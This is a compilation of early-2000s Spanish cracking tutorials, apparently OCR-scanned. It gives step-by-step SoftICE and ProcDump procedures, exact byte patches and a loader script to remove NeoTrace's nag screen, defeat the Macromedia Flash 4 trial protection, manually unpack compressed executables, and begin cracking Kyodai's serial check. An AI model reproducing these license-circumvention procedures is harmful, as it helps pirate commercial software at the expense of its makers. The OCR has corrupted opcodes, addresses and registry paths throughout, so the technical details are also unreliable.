Notice 


This PE File is not in Standard W'indows Format. 
All Data References will be terminated. 


Aceptar 


No problemo, vamos a ver si el programilla tiene protección contra desensamblador, la verdad es que de 
este tema no he leído nada "definitivo" todo el mundo lo hace y sin saber por qué, para no ser menos yo 
tampoco sé muy bien el por qué, no sé si verdaderamente es una protección contra desensambladores o 
es simplemente una inocente consecuencia de las propiedades de los encabezados PE...vamos a ver... 


y” ProcDump32 (C)] 1998, 1999 G-RoM, Lorian 4 Stone El ES 


PE Structure Editor 
Header Infos Structures Editor | [ Owner | Unpack 
A O sa | 
y FFCF7199 Rebuild PE 


Entry Point : [oo0E 92B4, 
Apply changes method : FFFFICCI 


Size of image : [oooF000D 
(* Only to PE header FFFFICCS 


| FFFF2D45 | 
o To PE file Cancel FFFF1CCI ) Bhrama Server 


Image Base : [00400000 
FFFEAFMA_ + 


Sections Informations : 


eMe | Yituel Size L Vireloltet | Piso | Bee Ote | Charectnías ox | 
00026000 00001000 00025908 00001000  EDO0DO20 
00003000 00027000 00002970 00027000 40000080 
00009034 00024000 0DOOSD34 00024000 E0O0DOZ2O umm 


D00B4F28 00034000 00064CD4 00034000 40000040 
DOD062B4 ODE 3000 0000482E ODE 3000 ED000020 


Cancel 


Abrimos otra vez el ProcDump y pulsamos en << PE Editor >>, nos sale otra ventanita, pulsamos en << 
Sections >>, nos aparece la última de las ventanitas, veréis que la primera sección ( .text ) en 
características tiene un valor de CO000080, tenéis que cambiarlo por E0000020 como en la imagen, 
normalmente nos basta con cambiar las características de la primera sección pero en este caso si 
cambiamos la primera ( .text ) y vamos a WDASM veremos que seguimos sin poder desensamblar el 
programa, nos da un ERROR y a la puta rue, pues bueno cambiaremos también la tercera ( .data ) con 
valor C0000040 por el valor E0000020, oooops! que no sabéis como cambiar el valor? simplemente 
pulsad en el nombre de la sección a cambiar con el botón derecho del roedor y pulsad en << Edit Section 
>> . Si os ha quedado el rollete como a mi id aceptando todas las ventanas y volved a WDASM, ya podéis 
ver el desensamblado completito del NeoTrace 2.12... 


El problema ahora es que poco podemos conseguir con WDASM así que vamos a SoftlCe y en menos de 
5 minutos tenemos el programa arreglado, insisto en que el programa al ejecutarse en su estado original 
se descomprime en memoria y luego se ejecuta, es decir no necesitamos para nada descomprimir el 
programa si vamos a utilizar SoftlCe... 


¿? Lo bueno si bueno dos veces bueno...SoftlCe 


Ejecutamos en Neotrace.exe y vamos a ver qué es lo que nos molesta...aparece una ventanita para meter 
datos geográficos...cancelamos y nos aparece una NAG con tres botones, le damos a << TRY >> y se 
continúa la ejecución, después ya no hay nada molesto.... 


Cómo atacamos? bueno hemos visto que la única molestia que nos causa el malandro es tener que estar 
aguantando esa ventanita y pulsando ese botoncillo, así que lo que se me ocurre es darle un repaso con 
SoftlCe y ver cómo se comporta cuando pulsamos el botón de << TRY >> y cuando pulsamos en botón de 
<< QUIT >> e intentar obligar al programa a que se comporte como si hubiésemos pulsado el << TRY >> 
pero sin sacarnos la NAG...vamos a ello... 


La dichosa ventanita hemos visto claramente que no es la típica "MessageBox" así que tiraremos por el 
segundo camino, usaremos la función "DialogBoxParamA", con el SoftlCe cargado ejecutamos el 
NeoTrace.exe, cuando nos salga la ventana en la que podemos mater nuestra localización entramos en 
SoftlCe ( CTRL+D ) y ponemos un punto de ruptura en esa función ( bpx dialogboxparama ) pulsamos F5 
para salir de SoftlCe y le damos a << CANCEL >>, apareceremos de nuevo en SoftlCe, parece que la 
función ha sido llamada bien bien...le pegamos a F11 para retornar de la función y aparecemos por arte 
de birlibirloque en la NAG, pulsamos el botón << TRY >> y aparecemos de nuevo en SoftlCe, en algo 
como esto: 


:00414A4DA 68D0614100 push 004161D0 
:00414A4DF 6400 push 00000000 


* Possible Reference to Dialog: DialogID_0226 
| 


:00414AE1 62826020000 push 00000226 

:00414AE6 56 push esi 

:00414AE7? FF158C724200 call dword ptr [0042728C] 
:00414AED S83F802 cp eax, O000000Z 
:00414AFO 5E pop esi 

:00414AF1 7503 jne 00414AF6 dez 
:00414AF3 33C0 xor eax, eax 

:D00414AF5 C3 ret 


Aparecemos en la dirección 00414AED, una comparación de EAX con 2, miramos en la ventana de 
registros y EAX contiene el valor 1, a continuación desempilamos un valor y como EAX /= 2 se ejecuta el 
salto y vamos a 00414AF6, pulsamos F5 para que el programa continúe su ejecución y aparecemos en 
NeoTrace... 


Hagamos otra pruebita, repetimos el proceso pero esta vez pulsando << QUIT >>, aparecemos en el 
mismo punto, miramos EAX y contiene un 2 luego el salto no se da y seguimos por el XOR, le damos a F5 
para que siga la ejecución y salimos del NeoTrace... 


Parece ser que hemos encontrado el punto donde el programa elige el camino a seguir, ya tenemos lo 
que queríamos, tenemos localizada la función que nos saca la ventanita y sabemos las decisiones que 
ésta toma según el botón pulsado, ahora pensemos en la solución, cómo evitamos la NAG? pues lo 
primero que se nos tiene que ocurrir es ir a 00414AD8 que es la dirección donde se le pasa el primer 
parámetro a la función y forzar un salto al punto donde el programa continúa su ejecución si se ha 
pulsado el << TRY >> 00414AF6. Esta solución será válida para muchos otros programas pero en este 
caso no, no veis que el programa desempila un valor y lo deja en ESI ( POP ESI) ? cambios en la pila jum 
jum eso no es bueno, seguro que nos llevará a un error, y además, si llegamos a 00414AF6 es porque 
EAX=1, si forzamos ese salto EAX será = 1? y si hay alguna comparación más tarde? mal rollete... 


Mi solución es reproducir la situación que se da al pulsar el botón de << TRY >>, lo haremos con un par 
de cambios, pondremos primero EAX a 1 y después añadiremos un salto que evite la llamada a 
"dialogboxparama", es decir que evite que tengamos que ver la NAG y pulsar el botón...vamos a probar 
primero los cambios en memoria por lo que pueda pasar... ejecutamos NeoTrace, en la ventana de 
localización pasamos a SoftlCe y ponemos un punto de ruptura en hmemcpy ( bpx hmemcpy ), F5 para 
volver a NeoTrace y le damos a << CANCEL >> y aparecemos en SoftlCe, vamos dándole a F12 hasta que 
estemos en el código del NeoTrace y una vez en él borramos nuestro breakpoint ( bc 0 ) y ponemos uno 
nuevo en el primer parámetro que le pasamos a la función ( bpx 414AD8 ), le damos a F5 para que siga 
rutando el programa y de nuevo aparecemos en SoftlCe, justo donde queríamos, vamos a cambiar las 
instrucciones en ensamblador así que ponemos "a" y le damos a enter, ponemos mov eax,1 para tener en 
EAX un 1 y después ¡mp 414AED para pasar de la NAG, las condiciones del salto se cumplen, la NAG la 
hemos pasado y desempilamos en ESI, justo lo que pasa cuando pulsamos el << TRY >>, bueno una vez 
introducidas las nuevas instrucciones le damos a ESCAPE para dejar de editar y pulsamos F5...VAYA! la 
NAG no apareció! somos muy malos! ;P 


¿? Compartiendo nuestro éxito con los koleguitas... 


Ya sabemos qué cambiar, pero para hacer el cambio permanente como el programa está comprimido 
escribiremos un loader que se ocupe de cargar el programa, buscar los bytes originales en memoria y 
cambiarlos por los bytes que nos conviene que se ejecuten, tenemos: 


Instrucciones originales ASM / Hexa Instrucciones Finales ASM / Hexa 
push 00000000 | 6A00 mov eax, 1 | B301000000 
push 004161D0 | 68D0614100 jmp 414AED | EBOE 


Vaya justo justo ocupamos dos instrucciones reales con nuestras modificaciones, de dónde he sacado 
los hexadecimales? de SoftlCe, al editar en ASM vemos los cambios, a la izquierda de la instrucción en 
ASM está su valor en hexadecimal... poquita cosa... ya sabemos qué y por qué cambiarlo, vamos a usar 
RISC Proccess Patcher para hacer el loader, necesitamos un script tal que así: 


; Loader NeoTrace 2.12, eliminado NAGS molestas by karlitoxZ [PNK|TNT] 
; 7 de Enero del 2000 

T=1000: 

F=neotrace.exe: 

Oz=neoloader.exe: 

P=414AD8/6A,00,68,D0,61,41,00/B8,01,00,00,00,EB,0E: 


Creo que no hace falta explicar otra vez cómo funciona este programilla, en el texto anterior ( exp10 ) lo 
tenéis bien clarito, y ya está, ahora cada vez que queramos usar NeoTrace y pasar de la NAG sólo 
tendremos que cargar el loader en el mismo directorio que el NeoTrace... así de simple... 


Como tenemos el ejecutable descomprimido y funcional vamos a parchearlo y así al menos en nuestro 
HD tendremos NeoTrace sin NAG y sin tener que usar loader, sólo tenemos que ir a nuestro editor 
hexadecimal y cambiar lo que antes he dicho...ya sabéis... 


¿? Last words... 


Ya está arregladito, otra vez mil disculpas, lo siento de veras, tengo la versión "karlitoxZ mete la pata" 
por si alguien la quiere, de los fallos se aprende no?... 


No ha sido difícil no? hemos aprendido un par de cosas más, algo es algo... Como siempre dejar claro 
que karlitoxZ no es más que un novato en esto, mucho camino todavía por recorrer... aquí estoy para 
serviros en lo que me sea posible... 


Saludos, agradecimientos, un piso en la luna y mil millones de dólares selenitas a “CaR191 ( no 
comment...un 10... ), chochis ( y su palm! ), josepZ ( ese parcheador! ), esiel2 ( tamos muy locos tío!! ), 
D_A (música? eso no es música! ;P ), xXASX ( TNT heartbreaker ), karpoff, skuater, profesor_X y el resto 
de la gente de TNT que no tengo el placer de conocer...AH! y como no el gran Mr.Black!, sin duda lo 
mejorcito que hay por la escena hispana, no cambies que así estás cañón! ;P 


Nos vemos en exp12 si es que algún día llega... 


Expediente 11 Final (14/01/00) por karlitoxZ, parte activa de: 


Dana | 


E: 
TNTCRACKTEAM 


Visita la página que estoy rutando con 4+CaR19%, llena de recursos para empezar a crackear y unas 
cuantas cosas más, completamente en castellano!!! 


[ONTHEROGKs!] 


Karpoff Spanis 
Tutorial Descargado de o 


Karpoff Spanish Tutor 


Programa: 


Macromedia Flash 4 


PROTECCION: Sales Agent 3.1.2. - 30 días de prueba 


Descripcion: Programa para crear gráficos vectoriales 


DL 


DOWNLOAD : 


http://www.macromedia.com 


Herramientas: Softlce v3.23 + IceDump 4, Procdump 32, PE Splitter de R!sc (o similar) 
CRACKER: Gádix FECHA: 7/03/2000 - Revisado 20/05/2000 


| INTRODUCCION 


Veremos la inutilidad (si no se toman las medidas adecuadas) de encriptar el ejecutable principal y meter en 
otro la protección. 


| AL ATAKE 


Instalamos el programa (recomiendo instalarlo con MagicEye, Removit o similar, pues la instalación nos esconderá 
algún fichero, que el desinstalador de Windows no eliminará). Vamos al directorio donde lo hemos instalado. 
Ejecutamos el único ejecutable que hay, que es Flash.exe (Umm! !, que raro sólo ocupa unos 200Kb). Nos sale una 
pantalla que nos dice que si queremos comprar ahora el producto, probarlo o salir. Pues vamos a probarlo. Ui, que 


Bueno, sin cerrar Flash, abrimos ProcDump32 y miramos las tareas que hay abiertas en este momento. Justo debajo de 
Flash.exe vemos otra tarea: Flash.tty. Si miramos en el explorador vemos que "flash.tty", ya tiene un tamaño un poco 
más normal (4 Mb). Lo editamos y vemos que empieza por la cadena "MZ". Esto tiene toda la pinta de ejecutable. Lo 
copiamos con otro nombre. Por ejemplo, "algo.exe". Lo ejecutamos y Windows pega uno de sus habituales 
"petardones". Esto pasa porque está encriptado. Pensemos. Cuando ejecutamos flash.exe y le damos a probar el 
producto, este debe desencriptar flash.tty en la memoria. 


La pregunta es: ¿está todo el ejecutable encriptado o por el contrario sólo está encriptada alguna sección? Que esté 
todo el ejecutable lo descartamos, porque al menos la cabecera del ejecutable está intacta (¿recordáis la cadena 


"MZ"?). Ahora queda saber cuáles son las secciones encriptadas. Para ello abrimos "flash.tty" con ProcDump y le 
damos a Sections: 


— Sections Informations : 


| Name | Virtual Size__ | Virtual Ofíset_[ Fiaw Size | Raw Oftset 


text 00271003 00001000 00271200 00000400 60000020 
«data O00668D0 00273000 00066400 00271600 40000040 
«data 0003BD38 0024000 0001C200 002D 8000 Co000040 
.idata 00004084 00316000 00004200 D02F4200 Co000040 
.ISIC O0OC70B4 00318000 O00C7200 002F8400 Co000040 
.teloc D002F2D2 DO3E 3000 0002F400 DO3BF600 Co000040 Cancel 


De paso nos apuntamos el Entry Point (el punto de entrada) que es: 
0014D930 + Image Base= 0014D930 + 00400000 = 0054D930 


Ahora viene lo realmente importante. Hay que poner un breakpoint de acceso a memoria (BPM) en cualquier punto de 
todas las secciones. Lo más fácil es ponerlo al principio de cada sección. Haremos el ejemplo de la sección ".text": 


Una vez dentro del proceso (flash.tty) y ponemos en la línea de comandos del Sice: 

bpm 401000 W 

bpx 0054D930 

Vamos a ver un poquito el porqué de estos breakpoints: 

Bpm es un tipo especial de breakpoint para accesos a memoria. 

401000 = Virtual Offset de la sección ".text" + Image Base (400000) (recordad que la suma es en hexadecimal) 
W (write)- nos interesa que nos avise el Sice sólo cuando se escriba en esa dirección de memoria. 


BPX 0054D930 - Nos interesa saber cuándo empieza a ejecutarse "Flash.tty", puesto que hay secciones como ".data" 
que cambian en tiempo de ejecución. 


Ponemos los breakpoints (BPM) correspondientes a cada sección y...vemos que sólo la sección ".text" cae en la trampa 
para osos (recordad, ANTES del Entry Point de "Flash.tty"). Tenemos dos opciones: volcar la sección con ProcDump 
o con el Sice parcheado con IceDump. Os explicaré las dos formas: 


MÉTODO 1: Usando PROCDUMP (pa los que no tengan PE Splitter o IceDump) 


Ejecutamos flash.exe (el de 200 Kb, se supone que todavía no estamos registrados), le damos a probar el producto. 
Abrimos ProcDump y en la lista de tareas sobre "flash.tty" le damos al botón derecho del ratón y seleccionamos 
"Process Infos". Ahora le damos a "Sections" y sobre ".text" le damos a "Save section to disk" y le llamamos, por 
ejemplo, "text.bin". Copia "flash.tty" a "algo.exe". En ProcDump le damos a "PE Editor" y seleccionamos "algo.exe". 
De nuevo le damos a "Sections". Sobre ".text" pulsamos en "Load section from disk". Escogemos "text.bin". Le damos 
a OK. Ahora (IMPORTANTE!) en "Apply changes method", pulsamos en "To PE file". OK otra vez y voilá, ya 
tenemos Flash 4 de por vida. 


MÉTODO 2: Usando IceDump 


Primeramente usamos PE Splitter (o cualquier programa que nos divida los ficheros en secciones) con "flash.tty". 


| Abrimos ProcDump y la damos a "PE Editor". Seleccionamos "flash.tty". Nos apuntamos el valor de "Image Base" 
(400000). Le damos a "Sections". Nos apuntamos el valor de "Virtual Offset" (1000) y de "Raw Size" (271200), 
ambos de la sección ".text". 


Primero voy a explicar cómo funciona el comando PAGEIN modificado: 
PAGEIN 123 

1 = Virtual Offset de ".text" + Image Base (400000) 

2 = Raw size de ".text" 

3 = un nombre de fichero cualquiera 


Arrancamos "flash.exe". Ahora nos tenemos que meter dentro del código de Flash (flash.tty). Para ello (hay muchas 
más formas de hacerlo) ponemos un breakpoint en Create WindowExA, le damos al menú de Help, About Flash y 
nuestro todopoderoso Softlce salta. Dos veces a F12 y ya estamos dentro de Flash. Ahora ponemos: 


PAGEIN 401000 271200 c:Mtext.bin 


Ya tenemos la sección ".text" desencriptada. Si todavía no habías usado PE Splitter con "flash.tty", hazlo ahora. Para 
obtener el ejecutable totalmente funcional, ponemos: 


copy /b a.r!sc.bin + text.bin + c.r!sc.bin + d.r!sc.bin + e.r!sc.bin + f.r!sc.bin + g.r!sc.bin gadix.exe 
De nuevo, tenemos Flash 4 de por vida. 
CUESTIONES ESTÉTICAS 


El programa ya no caduca, pero en el menú About no aparece nuestro nombre como registrados. Lo que sí sale es 
"Serial Number: FLW400-67963-17145-20486". Si trazamos con RegMon vemos que este número lo lee de 
HKEY_LOCAL_MACHINESoftwarelMacromediaWFlashWRegistration'Serial Number. Vamos a borrar esta clave, a ver que 
sucede (expórtala primero, para mayor seguridad). Nos sale una ventana pidiendo nuestro nombre, organización y un 
número de serie. Esta parte de la protección no es del Sales Agent, sino de la propia Macromedia. No nos vamos a 
complicar la vida. Metemos un nombre y organización cualquiera y como serial el que habíamos borrado antes del 
registro. Perfecto, nos acepta el serial. Pero, ¿porqué nos da Macromedia un serial válido? Pues para poder entrar 
durante los 30 días de evaluación. Una vez nos registramos con Sales Agent, éste nos borra el serial. Pero al no 
habernos registrado, el n* de serie válido permanece en el registro. Fijaos hasta que punto llega la inteligencia de los 
programadores de Macromedia. 


Para curiosos: Aunque el tiempo de evaluación haya expirado, poned un breakpoint en DialogBoxParamA. Arrancad el 
programa. Cuando salte el breakpoint, pulsad F12. Ahora pulsar en "Cancel". Volveréis al Sice. Poned a uno el valor 
de EAX (r eax 1). Pulsad E5,y.....Flash se ejecuta normalmente!!! Una prueba más de la desastrosidad del Sales 
Agent. 


Al tratarse de una protección genérica, posiblemente (no he tenido la ocasión de probar más programas con esta 
protección), con desencriptar la sección ".text", quedarán en nuestras manos un montón de programas más. Una 
protección más echada al traste... 


Este tute se lo dedico a Karpoff por su fantástica página y en general a todos los comparten sus conocimientos en 
Ingeniería Inversa. 


Por último os invito a visitar mi nueva página Web. Apetecible, para los que quieran aprender crackear, sobretodo 
JUEGOS (programas también). También os puede interesar la sección de cómo proteger vuestros propios programas. 


Espero vuestra colaboración!!! 


http://www.ctv.es/USERS/gadix 


Erratas, dudas y demás en: 


gadix O ctv.es 


sobre 
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Cómo descomprimir/desencriptar manualmente un ejecutable (PE). 


Programa: 


PROTECCION: descomprimir/desencriptar manualmente 

Descripcion: 

Dificultad: Avanzado 

DOWNLOAD : 

o 
CRACKER: Black Fenix. | FECHA: 08/08/2000 


INTRODUCCION 


Bienvenido a mi doceavo tutorial sobre cracking (puedes encontrar el resto en 
(http: //www.blackfenix.cjb.net/)) , en esta entrega vamos a tratar un tema bastante 


interesante: como descomprimir un ejecutable comprimido con cualquier compresor. Este 
tema es bastante avanzado y se recomienda un minimo conocimiento de la estructura de 

los ejecutables (ficheros PE) aunque he tratado de escribirlo para que los 'newbies' 

se enteren. 


| AL ATAKE 


La compresión en los archivos ejecutables a parte de reducir su tamaño se usa para evitar el desensamblado del programa y 
de esta manera se consigue que no sea posible la modificación directa del código (o eso piensan los que usan 
| compresores/encriptadores). 


| Bueno, ¿ Pero si no se puede modificar el código ya no podremos crackear más programas ? Pues esto es lo que creen los que 
Usan este tipo de compresores, pero si pensamos un poco veremos que podremos obtener el archivo sin comprimir y luego 
podremos modificarlo sin problemas, incluso a veces podemos parchear el ejecutable comprimido añadiendo instrucciones al 

| código (un ejemplo en mi tutorial número 11). 


Tengamos en cuenta lo siguiente: 


- Para que un archivo pueda descomprimirse debe de tener una parte de su código que no este comprimida y se 
encarge de descomprimir la parte que si esta comprimida, bien esto es cierto pero... 


- Puede que la parte de código que descomprime el archivo, este a su vez comprimida, si esto es así, deberá 
existir siempre una porción de código no comprimida que se encargue de descomprimir la rutina que 
descomprime el resto del archivo (valga la redundancia). 


Conclusión: Sea como sea para que un archivo comprimido pueda funcionar, debe descomprimirse en memoria. Esto significa 
que en algún momento de la ejecución del programa, este se auto descomprimirá y nosotros podremos verlo, modificarlo o 
copiarlo. Con lo cual podremos pasarlo de nuevo al disco desde la memoria y reconstruirlo si es necesario. 


La teoria sería la siguiente: 


|- 1.- Desensamblar el archivo comprimido. Esto puede resultar dificil, ya que algunos desensambladores no realizan bien esta 
tarea (ej. W32DAasm). Yo recomiendo usar el IDA Pro. 


- 2.- Ir al punto de entrada del programa. Y realizar un examen preliminar del código. Bucar las siguientes ocurrencias: 


call [registro + offset]  -> posibles llamadas a rutinas de decodificación 


call [address] -> O del Kernel. registro suele ser EBP 

rep movsd -> Usadas para copiar el codigo descomprimido 
rep movsw 

rep movsb 


|- 3.- Identificar la/s llamada/s que realizan la descompresión del archivo, puede que no todo el archivo este comprimido y solo lo 
esten algunas secciones (ej: .code .data .idata ) 


Nota: Algunos compresores, comprimen tambien en otra sección el código que descomprime las secciones del archivo, por lo 
que no podremos identificar la/s llamada/s hasta que ejecutemos el archivo con el debugger. Normalmente esta sección se 
descomprime en tiempo de ejecución y se copia al código del programa, una vez copiado el código descomprimido, se salta a 
este código para proceder con la descompresión del resto de secciones y luego se salta al punto de entrada del archivo 
descomprimido. 


| - 4.-Identificar las secciones que estan comprimidas y anotar sus nuevos tamaños así como su RVA (Relative Virtual Address). 
La RVA sería la posición de memoria donde se descomprime cada una de las secciones comprimidas. 


ej. xxxxxxxx:00401000 -> Esta sería la RVA 
| Te recomiendo que lo escribas en un papel de la siguiente manera: 


Sección: RVA Tamaño 


.code 401000h 5000h 
.data 406000h  1000h 


Nota: Algunos compresores modifican la tabla de importación (.idata) una vez descomprimida, por lo que deberemos 
asegurarnos que volquemos a disco la versión no modificada pero si descomprimida. Si no lo hacemos así no funcionará. Esto 
sucede con el compresor ASPack v1.08.04. 


| - 5.- Buscar donde se salta al punto de entrada del archivo descomprimido. Anotar este número. 


- 6.- Una vez en el punto de entrada original, podemos tener la certeza de que todas las secciones que debian ser 
descomprimidas han sido descomprimidas y así volcar cada una de estas secciones a disco. 


- 7.- Ahora nos faltará volcar las secciones no comprimidas del archivo comprimido a disco y anotar sus RVA y tamaños. 
También nos faltará la cabezera del ejecutable, que la volcaremos a disco. La cabezera empieza en el inicio del archivo 
comprimido y termina en el offset de la primera sección. 


- 8.- Unir todas las secciones en un solo archivo en el mismo orden en el que aparecen en el archivo comprimido y unir al 
principio del resultado la cabezera. 


ej: EXE = Cabezera PE + .code + .data + .idata + .rsrc + .reloc + ... 
Nota: es MUY IMPORTANTE anotar los nuevos ofísets dentro del archivo (Raw Offset) de cada una de estas secciones. 


- 9.- Modificar en la cabezera del ejecutable, el punto de entrada del programa para que sea igual al del paso 5. (Punto de 
entrada del programa descomprimido).Esto debe ser así por que el programa ya esta descomprimido, y antes su punto de 
entrada era el de la rutina de descompresión, como ahora ya está descomprimido no hay que ejecutar esta rutina (si se hace, el 
programa no funcionará). 

Modificar tambien los offsets (Raw Offset) y tamaños (Raw Size) de todas las secciones. Esto es debido a que ahora el archivo 
ocupará más tamaño y las secciones no estarán en los mismos puntos que antes. 


Nota: El tamaño de sección sólo variará en las secciones que estuvieran comprimidas, pero el offset variará para todas menos 
para la primera. 


- 10.- Si todo esta bien, ya podremos ejecutar el archivo. Opcionalmente podremos eliminar las secciones que contenian las 
rutinas de descompresión pero esto nos obligará a modificar los offtsets de las secciones que hubiera tras esta y posiblemente el 
punto de entrada para la tabla de importación (Import Table). 


Algunos compresores pueden eliminar la sección .reloc del archivo no comprimido o variarla ya que esta parece que no es 
necesaria en los archivos EXE (ASPack es un ejemplo). 

Tambien pueden sustituir y/o modificar la tabla de importación usada por el archivo original para que esta aparezca de manera 
incorrecta al desensamblar el archivo descomprimido y así dificultar el trabajo a los posibles crackers. (ASPack es un ejemplo) 


Cómo saber si estamos ante un archivo comprimido ? 


Podemos identificar la sección añadida por el compresor mirando los nombres de estas, algunos de estos nombres pueden ser: 


.aspack 
-petite 
.annakin 
.madmat 
WeiJunLi 


Pero no te fies, siempre se puede cambiar de nombre una sección. 


Puedes saber si esta comprimido si al desensamblar el archivo el código no aparece correctamente o las referencias a las DLL 
tampoco o las referencias a dialogos y cadenas tampoco. 


Tambien puedes usar una utilidad de identificación de jecutables, pero está no detectará los tipos de archivo que no conozca. 


Cómo encontrar el punto de entrada original ? 


El punto de entrada del programa descomprimido podremos localizarlo facilmente: Una vez finalizada la descompresión el 
programa deberá saltar a este punto, esto significa cambiar el ElP, y esto normalmente se hace con: 


un salto in/concicional: 
jmp 
jnz 
je 
etc... 
una llamada: 
call 


el siguiente código: 


push punto_entrada  -> empuja punto_entrada a la pila 
ret -> el ejecutar el ret, se saca el punto_entrada de la pila 
-> y se cambia el ElP al valor sacado de la pila 


También podremos saber que estamos en el punto de entrada cuando despues de una de las instrucciones 
anteriores veamos algo como: 


push ebp 
mov ebp, esp 


esto se suele hacer al inicio del programa para preparar la pila. Tambien sabremos que habremos pasado el punto de entrada 
cuando veamos llamadas a las siguientes funciones: 


KERNEL32.GetCommanoLine/A -> añadir la letra A para aplicaciones de 32 bits 
KERNEL32.GetStartupinfo/A 

KERNEL32.GetVersion 

KERNEL.INITTASK -> para aplicaciones de 16 bits 

USER.INITAPP -> para aplicaciones de 16 bits 
KERNEL32.GetModuleHandle/A 


estas funciones se usan normalmente al inicio de las aplicaciones para prepararlas. 


Cómo saber si la rutina de descompresión esta comprimida/encriptada (sistema multicapa) ? 


Si el sistema de compresión utilizado comprime/encripta también la sección que descomprime/desencripta las secciones 
comprimidas/encriptadas, el programa deberá descomprimirla y copiarla a una zona código que posiblemente estará cercana a 
la zona de código que estemos trazando en ese momento. (Ojo a los cambios en la pantalla de código del Softlce cuando estes 
trazando). 


Cómo encontrar las rutinas de descompresión/desencriptado ? 


Es lógico pensar que el programa debe descomprimir las diferentes secciones en un buffer previamente reservado, por lo que 
deberá alojar memoria para realizar esta operación puede que el programa use alguna de estas funciones para alojar la 
memoria: 


LPVOID VirtualAlloc( 
LPVOID IpAddress, // dirección o region a reservar 
DWORD dwsSize, // tamaño 
DWORD flAllocationType, / tipo de reserva 
DWORD fiProtect  // tipo de acceso de protección 
); 


La función VirtualAlloc reserva o da una region de paginas en una dirección de espacio virtual del proceso que la llama. La 
memoria reservada por esta función es inicilizada a cero. 


La función GlobalAlloc reserva el numero especificado de bytes del heap. En el entorno lineal del API de WIN32 no hay 
diferencia entre el heap local y el global. 


HGLOBAL GlobalAlloc( 
UINT uFlags, // atributos 
DWORD dwBytes  //numero de bytes a reservar 


); 


Pero si la tabla de importación esta comprimida, el programa no podrá tener acceso a estas funciónes y deberá cargar antes la 
DLL correspondiente dinámicamente para ello podrá usar la siguiente funcion: 


HMODULE GetModuleHandle( 
LPCTSTR IpModuleName  //puntero a una cadena con el nombre del módulo 


); 


La función GetModuleHandle retorna un handle de modulo para el modulo especificado si el modulo a sido mapeado en el 


espacio de memoria del proceso que la llama. 
y luego obtener un puntero a la función deseada con 


FARPROC GetProcAddress( 
HMODULE hModule, // handle al módulo DLL (ver GetModuleHandle) 
LPCSTR IpProcName  //nombre de la función 


); 


La función GetProcAddress retorna la dirección de una función especificada dentro de la DLL exportada. ahora si podrá usar la 
función, pero deberá copiar el buffer descomprimido a la posición de memoria donde se encuentre la sección, esto podrá 
hacerlo con la función: 


VOID CopyMemory ( 
PVOID Destination,  // dirección de destino 
CONST VOID *Source, // dirección del bloque a copiar 
DWORD Length  // tamaño en bytes, del bloque a copiar 
); 


o con: 


BOOL WriteProcessMemory( 
HANDLE hProcess,  // handle del proceso al cual se escribe 
LPVOID IpBaseAddress,  // dirección de inicio de escritura 
LPVOID IpBuffer,  // puntero al buffer de origen 
DWORD nSize, // numero de bytes a escribir 
LPDWORD IpNumberOfBytesWritten //numero actual de bytes escritos 


); 


La función WriteProcessMemory escribe memoria en el proceso indicado. El area a ser escrita debe ser accesible o la 
operación fallará. O manualmente en ensamblador con alguna de estas instrucciones o una combinación de estas. 


rep movsb 
rep movsw 
rep movsd 


Posteriormente deberá desalojar el buffer con: 


BOOL VirtualFree( 
LPVOID IpAddress, // dirección de la región 
DWORD dwsSize, // tamaño 
DWORD dwrFreeType  / tipo de liberación 
E 


La función VirtualFree libera una region de paginas del espacio de memoria virtual del proceso que la llamó. 
ocon: 


HGLOBAL GlobalFree( 
HGLOBAL hMem // handle al objeto global de memoria 


); 


La función GlobalFree libera la memoria global especificada e invalida su handle. 


Cómo volcar las secciones ? | 


Si el volcador de memoria que usemos no esta integrado con el debugger (ej. SoftDump, ADump ), y queremos volcar la 
sección a disco deberemos hacerlo con un volcador externo, pero si salimos del debugger el programa continuará ejecutandose 
y nosotros queremos que se quede en este punto mientras copiamos la sección al disco. 

Para solucionar esto, podemos parar la ejecución del programa donde nos interese y en este punto ensamblar la instrucción: 


jmp valor_de_eip 


Nota: recuerda apuntar la instrucción que hubiera sobre esa linea. 


esto dejará al programa en un bucle infinito hasta que interrunpamos de nuevo su ejecución con el debugger. Mientras el 
programa este en este bucle podremos ejecutar el volcador de memoria. Luego volveremos al debugger y ensamblaremos la 
instrucción que habia antes y continuaremos trazando si es necesario. 


por Black Fenix. http://www.blackfenix.cjb.net/ 


La información aquí vertida es exclusivamente para uso educacional, no puedo hacerme responsable del uso que se haga 
de esta, por lo que atiendo a la honradez de cada uno :), recuerda que debes comprar el software que utilices :) 
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Programa: Kyodai v 11.42x 


PROTECCION: Empaquetado, Número de Serie 


Entretenida colección de solitarios 


Dificultad: Principiante 


http: //kyodai.com (PcWorld Junio2000) 


Descripcion: 


DOWNLOAD : 


Herramientas: GetTyp , ProcDump , Wdasm 8.93 y Softice 
CRACKER: KuaTo_ThoR FECHA: 16/08/2000 


| INTRODUCCION | 


Muy bien ya estamos aquí otra vez. 


Como he puesto arriba se puede pillar en el cd de pewolrd de junio de 2000, lo curioso es que al instalarlo 
aparecen dos versiones, la 10.21 (OpenGL) y la 11.42 (DirectX). 


Sobre la versión 10.21 he visto un tutorial del gran Mr_WhiTe, que supongo podréis encontrar en su página 
personal, http://www.misterwhite.com/. 


Bueno a lo que vamos, ejecutamos el programa (me referiré siempre al de DirectX), (recomiendo que pongáis 
el idioma en inglés, ya que las cadenas de texto en el programa estarán en inglés, aunque realmente da igual) 
todo muy bonito, hasta que nos salta el nag diciéndonos que nos registremos que él es casi pobre :-(, cómo si 
nosotros fuésemos ricos, no te jode. 


| AL ATAKE 


Bueno, después de este acaloramiento, probamos a jugar a algún juego, si no habéis jugado antes a este juego (mi 
caso) antes de que os hayáis enterado como va, os aparecerá otro asqueroso nag pidiendo que nos registremos, ¡¡Así no 
hay quien juegue!!, así que nos disponemos a registrarnos, pero sin conectarnos a internet, jeje. 


Vamos a la Ayuda, a Registro, y metemos lo que sea, por ejemplo: Nombre: Perico; Serial: eldelospalotes, y como era 
de esperar nos dice que no cuela, en concreto dice lo siguiente: "Sorry, wrong password. Please check out if you 
entered the user name and password exactly as I[ gave them to you.” Como siempre nos quedamos con la frase, y 
supongo que todos sabemos donde vamos ahora. 


Vamos a Wdasm, abrimos el archivo Kyodai.exe .... y se nos quedo colgado el Wdasm. ¿Qué pasa? Pues que nuestro 
programador pobre se ha gastado su dinero en un compresor ( un programa compresor , no un compresor de los de aire 
:-)). La pregunta es, ¿en cuál de ellos se ha gastado los cuartos?. Para responderla probamos con GetTyp, lo 
ejecutamos, vamos a 'open' y seleccionamos kyodai.exe, ahí está nuestra respuesta, ASPack 2000 . 


